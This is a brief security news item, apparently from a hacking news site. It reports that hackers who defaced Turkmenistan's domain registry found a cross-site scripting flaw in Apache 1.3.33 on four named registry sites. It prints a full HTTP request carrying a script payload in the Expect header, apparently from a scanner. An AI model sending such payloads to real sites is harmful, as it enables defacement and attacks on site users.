The hackers who recently defaced Top level Domains of Turkmenistan by exploiting the vulnerability in NIC.tm, has discovered another vulnerability in the website.
They found that the few NIC websites uses the vulnerable version of Apache server(version 1.3.33) . The version has a security flaw that exists in the handling of invalid Expect headers. Modifying the Expect header value to XSS code results in Cross site scripting attack.
GET / HTTP/1.1
Expect: <script>alert("E Hacking News")</script>
Host: nic.tm
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
 |
| Expect Header xss attack |
The vulnerability affects four NIC websites : www.nic.ac, www.nic.tm ,www.nic.io,www.nic.sh.
There is another important security flaw in the Apache server : Mod_rewrite which is vulnerable to buffer overflow(Vulnerability Details).